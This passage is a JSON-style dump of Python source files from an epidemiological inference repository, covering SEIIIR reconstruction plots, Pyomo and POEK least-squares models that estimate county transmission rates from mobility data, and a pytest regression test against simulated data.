color='black', legend='Simulated I1')\n dfdetrecon_I1[dfdetrecon_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I2.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n dfdetrecon_I2[dfdetrecon_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I3.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n dfdetrecon_I3[dfdetrecon_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='red', legend='Deterministic_Recon I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_R.index = pd.to_datetime(dfrecon_R.index)\n ax = dfrecon_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n dfdetrecon_R[dfdetrecon_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='red', legend='Deterministic_Recon R')\n lower_percentile = dfrecon_R.quantile(0.025, axis=1)[dfrecon_R.index[-1]]\n upper_percentile = dfrecon_R.quantile(0.975, axis=1)[dfrecon_R.index[-1]]\n sim_value = dfsim_R[dfrecon_R.index[-1]]\n msg = ''\n if sim_value < lower_percentile or sim_value > upper_percentile:\n msg = '*'\n print('Simulated R outside of 95th percentiles for count {}: ({} ({}) {}) {}'.format(c, lower_percentile, sim_value, upper_percentile, msg))\n\n plt.title('R comparison ({} ({}) {}) {}'.format(lower_percentile, sim_value, upper_percentile, msg))\n pdf.savefig()\n plt.close()\n\n pdf.close()\n\n\n\nif __name__ == '__main__':\n np.random.seed(1975)\n seiiir_fname = './input_data/FL_SEIIIR_R0_2.25_short_realization_4.csv'\n det_recon_fname = './data/FL/recon-det/recon_deterministic_delay_10.csv'\n recon_folder_name = './data/FL/recon-stoch'\n geodata_fname = './input_data/geodata.csv'\n output_path = './figures/'\n \n compare_florida_reconstruction(seiiir_fname, det_recon_fname, recon_folder_name, geodata_fname, output_path)\n \n" }, { "alpha_fraction": 0.6329411864280701, "alphanum_fraction": 0.6399999856948853, "avg_line_length": 21.945945739746094, "blob_id": "70755e3a649d60de84eeb64e2d34f7560fbf1a62", "content_id": "6bfd6cee4fa725d1d12def0980bae531a911e169", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 850, "license_type": "no_license", "max_line_length": 105, "num_lines": 37, "path": "/epi_inference/workflow/Rtest_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\ntry:\n import rpy2\n rpy2_available = True\nexcept:\n rpy2_available = False\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef run(CONFIG, warnings):\n print(\"Running test.R\")\n import rpy2.robjects as robjects\n robjects.r.source('../../../R_utilities/test.R')\n\n\nclass RTestWorkflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"Rtest\",\n \"Simple test of R interface from Python.\")\n\n def run(self, data, CONFIG):\n if not rpy2_available:\n raise RuntimeError(\"ERROR: cannot execute Rtest workflow. Package 'rpy2' is not available.\")\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(RTestWorkflow())\n\n" }, { "alpha_fraction": 0.6073306798934937, "alphanum_fraction": 0.6125896573066711, "avg_line_length": 35.690059661865234, "blob_id": "31b10f20c43239a3b7550c828b7b105a299eb8cc", "content_id": "b6c9c243e6c34ca964617eed4329e5945202d6bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6275, "license_type": "no_license", "max_line_length": 324, "num_lines": 171, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_poek.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_poek']\n\nimport itertools\nimport pyutilib.misc.timing as timing\nfrom pyutilib.misc.misc import Bunch\ntry:\n import poek as pk\n poek_available = True\nexcept:\n poek_available = False\n\n\ndef run_multinode_mobility_window_decay_lsq_poek(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n if not poek_available:\n raise RuntimeError(\"Cannot solve the mobility window formulation with poek\")\n\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n if m.model is None:\n return {'beta': None, 'status': 'failed', 'msg': 'Empty model.'}\n\n #m.model.write(\"output.nl\")\n # call the solver\n timing.tic('Starting timer for solver')\n nlp = pk.nlp_model(m.model, \"cppad\")\n solver = pk.nlp_solver('ipopt')\n #solver.options['tol']=1e-8\n status = solver.solve(nlp)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n ##if check_optimal_termination(status) == False:\n ## return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = m.window_days\n county['date'] = [recon[i]['dates'][w] for w in m.WINDOWS]\n if i in m.NODES:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n for w in m.WINDOWS:\n if False and m.beta[i,w].stale == True:\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( m.beta[i,w].value )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( m.window_transmissions[i][w] )\n results[i] = county\n\n return results\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction - POEK')\n model = pk.model()\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n NODES = set(k for k in recon)\n\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n populations = dict()\n percent_mobile = dict()\n for nodeid in NODES:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in NODES)/populations[nodeid] if nodeid in mobility else 0\n\n if not hasattr(model, 'TIMES'):\n TIMES = [i for i in range(len(recon[nodeid]['transmissions']))]\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n WINDOWS = list()\n WINDOW_TIMES = list()\n window_days = window\n for i in range(len(TIMES)):\n if i % 7 != 0:\n continue\n if i < window_days:\n continue\n for j in range(i+1-window_days, i+1):\n WINDOW_TIMES.append((i,j)) \n WINDOWS.append(i)\n timing.toc('built windows')\n\n # transmission parameter\n beta = model.variable(index=[(i,j) for i in NODES for j in WINDOWS], value=1.0, lb=0)\n timing.toc('built variables')\n\n T_hat = {}\n for i,W in itertools.product(NODES, WINDOW_TIMES):\n w,t = W\n #for i in NODES:\n # for w,t in WINDOW_TIMES:\n\n T_hat[i,w,t] = beta[i,w] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(beta[j,w] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[i]*populations[j])) for j in mobility[i] if j in NODES)\n\n timing.toc('built infection process')\n\n # least squares objective function\n lse = {}\n for i in NODES:\n lse[i] = sum( (T_hat[i,w,t] - T_data[i][t])**2 for w,t in WINDOW_TIMES)\n\n model.add( sum(lse[i] for i in NODES) )\n timing.toc('built objective')\n\n # get the approximate transmissions over the window period\n window_transmissions = dict()\n for i in NODES:\n d = dict()\n for w in WINDOWS:\n d[w] = sum(T_data[i][t] for ww,t in WINDOW_TIMES if ww == w)\n window_transmissions[i] = d\n \n return Bunch(model=model, WINDOWS=WINDOWS, window_transmissions=window_transmissions, beta=beta, NODES=NODES, window_days=window_days)\n\n" }, { "alpha_fraction": 0.5602084994316101, "alphanum_fraction": 0.5696094632148743, "avg_line_length": 42.98871994018555, "blob_id": "a86341fe6c6bf428395f88eb83d68faa51a833e2", "content_id": "8db82bc7894d68d40a7fedbe4dacbf904e884f6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11701, "license_type": "no_license", "max_line_length": 188, "num_lines": 266, "path": "/epi_inference/tests/test_run_on_simulated.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport yaml\nimport numpy as np\nimport pandas as pd\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_json, compare_csv\n\nskip_new_files = False\n\nclass TestRunOnSimulated():\n @classmethod\n def setup_class(cls):\n # change to the test directory\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n rundir = os.path.join(thisfiledir, 'run_on_simulated')\n os.chdir(rundir)\n\n @classmethod\n def teardown_class(cls):\n # return to the previous directory\n os.chdir(cls._origdir)\n\n def test_run_on_simulated(self):\n args = Options()\n args.block = 'all'\n args.config_file = './workflows/run_on_simulated.yml'\n args.verbose = True\n\n # remove old results files used in comparison\n res_files = _walk_files('results/run_on_simulated', '.json')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated', f))\n res_files = _walk_files('results/run_on_simulated', '.csv')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated', f))\n\n driver.run(args)\n\n #\n # compare the reconstruction results\n #\n # read in the simulation data\n simdf = pd.read_csv('./simulated_data/SEIIIR_R0_2.25_short_realization_4.csv')\n \n # read in the seeds to help with comparisons\n with open('./config/seeds_50.yml', 'r') as fd:\n seeds = yaml.safe_load(fd)\n seeds = [str(sd) for sd in seeds]\n\n #\n # Comparison of results with simulation parameters\n # If these tests pass, it is safe to update the gold standards compared later\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R']\n\n # read all the json files and compute statistics across the seeds\n recon = dict()\n for sd in seeds:\n with open('./results/run_on_simulated/reconstruct_stochastic_confirmed/recon_stochastic_10_{}.json'.format(str(sd)),'r') as fd:\n recon[sd] = json.load(fd)\n\n counties = list(recon[seeds[0]].keys())\n dates = list(recon[seeds[0]][counties[0]][\"dates\"])\n\n # check that the counties are the same across all realizations\n for sd in seeds:\n assert counties == list(recon[sd].keys())\n\n # check that the dates are the same across all counties, realizations\n for cname in counties:\n for sd in seeds:\n assert dates == recon[sd][cname]['dates']\n\n # check each county, date, series\n total_count = 0\n outside_count = 0\n mean_error_count = 0\n for cname in counties:\n for sname in series:\n sim = simdf[simdf['comp']==sname]\n for i,dt in enumerate(dates):\n if dt in sim.Date.values:\n simdt = sim[sim['Date']==dt]\n data = list()\n for sd in seeds:\n data.append(recon[sd][cname][sname][i])\n data = np.asarray(data)\n mn = np.mean(data)\n ql = np.quantile(data,q=0.025)\n qu = np.quantile(data,q=0.975)\n v = float(simdt[cname].values)\n total_count += 1\n if (v < ql or v > qu):\n outside_count += 1\n # print('Outside confidence:', cname, sname, dt, v, ':', ql, mn, qu)\n if abs(v-mn) > 10 and abs(v-mn)/max(1,v) > 0.2:\n mean_error_count += 1\n # print('Error with mean > 20%:', cname, sname, dt, v, ':', ql, mn, qu)\n\n print('Reconstruction fraction outside 95%:', outside_count/total_count)\n print('Reconstruction fraction with error in mean > 20%:', mean_error_count/total_count)\n assert outside_count / total_count < 0.05\n assert mean_error_count / total_count < 0.05\n\n #\n # compare the inference results\n # This comparison is filtered - window must have at least 50 cases,\n # and there must be at least 25 (half) realizations with estimates\n #\n # read all the json files and compute statistics across the seeds\n inference = dict()\n for sd in seeds:\n with open('./results/run_on_simulated/inference_stochastic_confirmed/inference_mobility_window_10_{}.json'.format(str(sd)),'r') as fd:\n inference[sd] = json.load(fd)\n\n counties = list(inference[seeds[0]].keys())\n dates = list(inference[seeds[0]][counties[0]][\"date\"])\n\n # check that the counties are the same across all realizations\n for sd in seeds:\n assert counties == list(inference[sd].keys())\n\n # check that the dates are the same across all counties, realizations\n for cname in counties:\n for sd in seeds:\n assert dates == inference[sd][cname]['date']\n\n # check each county, date\n total_count = 0\n outside_count = 0\n mean_error_count = 0\n for cname in counties:\n for i,dt in enumerate(dates):\n data = list()\n for sd in seeds:\n estbeta = inference[sd][cname]['beta'][i]\n if estbeta is not None and inference[sd][cname]['infections_in_window'][i] > 50: # filter out insufficient data - 100 means there were only ~10 reported cases in window\n data.append(estbeta)\n if len(data) >= 25: ### # need at least 10 that are not None to get some statistics\n data = np.asarray(data)\n mn = np.mean(data)\n ql = np.quantile(data,q=0.025)\n qu = np.quantile(data,q=0.975)\n v = 2.25/4.3\n total_count += 1\n if (v < ql or v > qu):\n outside_count += 1\n # print('Beta outside confidence:', cname, 'beta', dt, v, ':', ql, mn, qu, '# Not None:', len(data) )\n if abs(v-mn)/max(1,v) > 0.2:\n mean_error_count += 1\n # print('Beta error with mean > 20%:', cname, 'beta', dt, v, ':', ql, mn, qu, '# Not None:', len(data))\n\n print('Inference fraction outside 95%:', outside_count/total_count)\n print('Inference fraction with error in mean > 20%:', mean_error_count/total_count)\n assert outside_count / total_count < 0.05\n assert mean_error_count / total_count < 0.15\n\n #\n # compare all the json files (gold standard)\n #\n res_json_files = _walk_files('results/run_on_simulated', '.json')\n baseline_json_files = set(_walk_files('baseline/run_on_simulated', '.json'))\n for f in res_json_files:\n if not skip_new_files:\n assert f in baseline_json_files # if this fails then there are files in the new results that are not in the baseline\n\n if f in baseline_json_files:\n baseline_json_files.remove(f)\n res_file = os.path.join('results/run_on_simulated', f)\n baseline_file = os.path.join('baseline/run_on_simulated', f)\n compare_json(res_file, baseline_file, abs_tol=1e-6)\n\n if len(baseline_json_files) != 0:\n print(baseline_json_files)\n assert len(baseline_json_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n #\n # compare all the csv files (gold standard)\n #\n res_csv_files = _walk_files('results/run_on_simulated', '.csv')\n baseline_csv_files = set(_walk_files('baseline/run_on_simulated', '.csv'))\n for f in res_csv_files:\n if not skip_new_files:\n assert f in baseline_csv_files # if this fails then there are files in the new results that are not in the baseline\n if f in baseline_csv_files:\n baseline_csv_files.remove(f)\n res_file = os.path.join('results/run_on_simulated', f)\n baseline_file = os.path.join('baseline/run_on_simulated', f)\n compare_csv(res_file, baseline_file, check_exact=False)\n\n if len(baseline_csv_files) != 0:\n print(baseline_csv_files)\n assert len(baseline_csv_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n\n @pytest.mark.skip('skipped - not testing anything that run_on_simulated does not')\n def test_run_on_simulated_half(self):\n args = Options()\n args.block = 'all'\n args.config_file = './workflows/run_on_simulated_half.yml'\n args.verbose = True\n\n # remove old results files used in comparison\n res_files = _walk_files('results/run_on_simulated_half', '.json')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated_half', f))\n res_files = _walk_files('results/run_on_simulated_half', '.csv')\n for f in res_files:\n os.remove(os.path.join('results/run_on_simulated_half', f))\n\n driver.run(args)\n\n #\n # compare all the json files (gold standard)\n #\n res_json_files = _walk_files('results/run_on_simulated_half', '.json')\n baseline_json_files = set(_walk_files('baseline/run_on_simulated_half', '.json'))\n for f in res_json_files:\n if not skip_new_files:\n assert f in baseline_json_files # if this fails then there are files in the new results that are not in the baseline\n\n if f in baseline_json_files:\n baseline_json_files.remove(f)\n res_file = os.path.join('results/run_on_simulated_half', f)\n baseline_file = os.path.join('baseline/run_on_simulated_half', f)\n compare_json(res_file, baseline_file, abs_tol=1e-6)\n\n assert len(baseline_json_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\n #\n # compare all the csv files (gold standard)\n #\n res_csv_files = _walk_files('results/run_on_simulated_half', '.csv')\n baseline_csv_files = set(_walk_files('baseline/run_on_simulated_half', '.csv'))\n for f in res_csv_files:\n if not skip_new_files:\n assert f in baseline_csv_files # if this fails then there are files in the new results that are not in the baseline\n if f in baseline_csv_files:\n baseline_csv_files.remove(f)\n res_file = os.path.join('results/run_on_simulated_half', f)\n baseline_file = os.path.join('baseline/run_on_simulated_half', f)\n compare_csv(res_file, baseline_file, check_exact=False)\n \n assert len(baseline_csv_files) == 0 # if this fails, then there are files in the baseline that did not appear in the new results\n\ndef _walk_files(basepath, extension):\n # get all the files of a particular extension in the directory tree\n ret_files = list()\n\n for path, folders, files in os.walk(basepath):\n for f in files:\n fname, fext = os.path.splitext(f)\n if fext == extension:\n relfname = os.path.relpath(os.path.join(path,f), basepath)\n ret_files.append(relfname)\n return ret_files\n" }, { "alpha_fraction": 0.6022974252700806, "alphanum_fraction": 0.6071613430976868, "avg_line_length": 46.367645263671875, "blob_id": "23071f9d2fa0ab72d5d0af91d1d4b059a36b329d", "content_id": "e733b351de64bfb23ef20f17a667167c225e3801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9663, "license_type": "no_license", "max_line_length": 327, "num_lines": 204, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_iterative.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_iterative']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\nfrom .util import get_windows, indices_since_first_nonzero\n\ndef run_multinode_mobility_window_decay_lsq_iterative(*, recon, mobility, analysis_window, objective, select_window=None, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility: dict()\n A dictionary of sparse mobility data\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the inference. If None, then the full set of data will be used.\n The key \"days\" indicates the length of the analysis window in days. The\n date returned in the analysis is the last day of this window.\n objective : str\n Choice of objective function to use. Least-squares (lsq) is the default.\n select_window: str\n Date corresponding to a particular window for analysis\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n timing.tic('Starting timer for model construction - Pyomo')\n # check the input data\n assert objective == 'lsq' or objective == 'binomial-likelihood'\n window_length_days = int(analysis_window.get('days',14))\n assert(window_length_days >= 1)\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n # create the set of nodes used in the model - use sorted_nodes for\n # determinism, the set nodes for check\n nodes = set(k for k in recon)\n sorted_nodes = sorted(nodes)\n\n # build data structures for the parameters\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n orig_rep_cases = dict()\n days_since_first_reported = dict()\n populations = dict()\n percent_mobile = dict()\n dates = None\n for nodeid in sorted_nodes:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n orig_rep_cases[nodeid] = recon[nodeid]['orig_rep_cases']\n days_since_first_reported[nodeid] = indices_since_first_nonzero(orig_rep_cases[nodeid])\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in nodes)/populations[nodeid] if nodeid in mobility else 0\n\n if dates is None:\n # dates should be the same across all counties\n dates = recon[nodeid]['dates']\n assert dates == recon[nodeid]['dates']\n\n timing.toc('setup inference parameters (transmissions, population, mobility, etc.')\n\n # define the WINDOW_TIMES tuple pairs for the windows\n windows = get_windows(dates, window_days=window_length_days, select_window=select_window)\n WINDOW_TIMES = windows.WINDOW_TIMES\n\n # gather some extra data to be reported with the window period\n # approx. transmissions and infections (from reconstruction)\n # and reported cases,\n window_transmissions = dict()\n infectious_pop_over_window = dict()\n transmissions_over_window = dict()\n reported_cases_over_window = dict()\n days_since_first_reported_by_window = dict()\n for i in sorted_nodes:\n infectious_pop_over_window[i] = dict()\n transmissions_over_window[i] = dict()\n reported_cases_over_window[i] = dict()\n days_since_first_reported_by_window[i] = dict()\n d = dict()\n for w in WINDOW_TIMES:\n d[w] = sum(T_data[i][t] for t in WINDOW_TIMES[w])\n infectious_pop_over_window[i][w] = list(I1_data[i][t] + I2_data[i][t] + I3_data[i][t] for t in WINDOW_TIMES[w])\n transmissions_over_window[i][w] = list(T_data[i][t] for t in WINDOW_TIMES[w])\n reported_cases_over_window[i][w] = list(orig_rep_cases[i][t] for t in WINDOW_TIMES[w])\n days_since_first_reported_by_window[i][w] = days_since_first_reported[i][WINDOW_TIMES[w][-1]]\n window_transmissions[i] = d\n\n # Setup results object\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = window_length_days\n county['date'] = [recon[i]['dates'][w] for w in WINDOW_TIMES]\n if i in nodes:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n county['infectious_pop_over_window'] = []\n county['transmissions_over_window'] = []\n county['reported_cases_over_window'] = []\n county['days_since_first_reported'] = []\n results[i] = county\n\n #\n # Setup and solve different problems for each window\n #\n for w in WINDOW_TIMES:\n timing.tic('Starting timer for model construction - Pyomo')\n model = pe.ConcreteModel()\n model.NODES = pe.Set(initialize=sorted_nodes, ordered=True)\n model.beta = pe.Var(model.NODES, initialize=1.0, bounds=(0,None)) \n\n # check the total number of infections - if there are none across\n # all counties, the optimization will not run\n total_infections = 0\n for t in WINDOW_TIMES[w]:\n for i in sorted_nodes:\n total_infections += I1_data[i][t] + I2_data[i][t] + I3_data[i][t]\n\n if total_infections > 0:\n # define the expression for estimated transmissions\n def _infection_process(m, i, t):\n return model.beta[i] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(model.beta[j] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[j]*populations[i])) for j in mobility[i] if j in nodes)\n \n model.T_hat = pe.Expression(model.NODES, WINDOW_TIMES[w], rule=_infection_process)\n\n # we want to record which T_hat expressions are guaranteed to be zero\n # so we can remove them from the likelihood function (don't want ln(0))\n # since they are initialized to 1.0, we can easily check this by\n # evaluating them. If they evaluate to zero, then we record the indices\n zero_T_hats = set()\n for n in model.NODES:\n for t in WINDOW_TIMES[w]:\n if abs(pe.value(model.T_hat[n,t])) < 1e-10:\n zero_T_hats.add((n,t))\n\n timing.toc('built infection process')\n\n model.total_lse = pe.Objective(expr=sum((model.T_hat[i,t] - T_data[i][t])**2 for i,t in model.T_hat)/len(model.T_hat))\n timing.toc('built objective')\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(model, options={'print_level':0})\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error for window %s and time %s.' % (str(w),str(t))}\n\n if objective == 'binomial-likelihood':\n # solve the binomial-likelihood\n # note that we want the call to the lsq part above to initialize\n model.total_like = pe.Objective(\n expr=sum( T_data[i][t]*pe.log(1.0-pe.exp(-model.T_hat[i,t]/S_data[i][t])) + (S_data[i][t]-T_data[i][t])*(-model.T_hat[i,t]/S_data[i][t]) \\\n for i,t in model.T_hat if (i,t) not in zero_T_hats),\n sense=pe.maximize\n )\n model.total_lse.deactivate()\n timing.tic('Starting timer for solver with likelihood objective')\n status = solver.solve(model, tee=True)\n timing.toc('Finished solver with likelihood objective')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 'failed-likelihood', 'msg': 'Unknown solver error for window %s and time %s.' % (str(w),str(t))}\n\n # Grab the results from the solver\n for i in recon:\n if i not in nodes:\n continue\n county = results[i]\n\n if total_infections <= 0 or model.beta[i].stale == True:\n # did not have sufficient data to determine a value for beta\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( value(model.beta[i]) )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( window_transmissions[i][w] )\n county['infectious_pop_over_window'].append( infectious_pop_over_window[i][w] )\n county['transmissions_over_window'].append( transmissions_over_window[i][w] )\n county['reported_cases_over_window'].append( reported_cases_over_window[i][w] )\n county['days_since_first_reported'].append( days_since_first_reported_by_window[i][w] )\n\n return results\n" }, { "alpha_fraction": 0.6307286620140076, "alphanum_fraction": 0.6417277455329895, "avg_line_length": 40.56190490722656, "blob_id": "e26a30df38afed874d14d42627c7f55ef17ce46d", "content_id": "e5b79b70db91085dc8fda54f95394bc4d94ce389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8728, "license_type": "no_license", "max_line_length": 194, "num_lines": 210, "path": "/epi_inference/formulations/decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom epi_inference.reconstruction import common as rcommon\nfrom epi_inference.reconstruction import deterministic as recond\n\n# ToDo: add datetime handling to pass in the dates associated with the data\ndef run_decay_lsq(cm_rep_cases, population, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n cm_rep_cases : list of *new* cases reported in each time period\n Note that this list is 1 entry longer than the transmissions, and \n it must start at zero (based on the assumptions in the reconstruction).\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check validity of some of the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert population > 0\n assert reporting_factor >= 1\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n report_delay=report_delay, reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose,\n lse=True\n )\n\n reconstruction = {\n 'date': m.DATES,\n 'S': m.S_data,\n 'T': m.T_data,\n 'E': m.E_data,\n 'I1': m.I1_data,\n 'I2': m.I2_data,\n 'I3': m.I3_data,\n 'R': m.R_data\n }\n \n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.', 'population':population, 'total_cases':cm_rep_cases[-1], 'reconstruction': reconstruction}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None,\n 'status': 'stale',\n 'msg': 'Transmission parameter beta not solved (stale).',\n 'population':population,\n 'total_cases':cm_rep_cases[-1],\n 'reconstruction': reconstruction\n }\n\n return {'est_beta': value(m.beta),\n 'status': 'ok',\n 'msg': 'Optimal solution found',\n 'population':population,\n 'total_cases':cm_rep_cases[-1],\n 'reconstruction': reconstruction\n }\n\ndef create_inference_formulation_decay(Cdates, cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False, lse=True):\n \"\"\"\n Creates a one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for 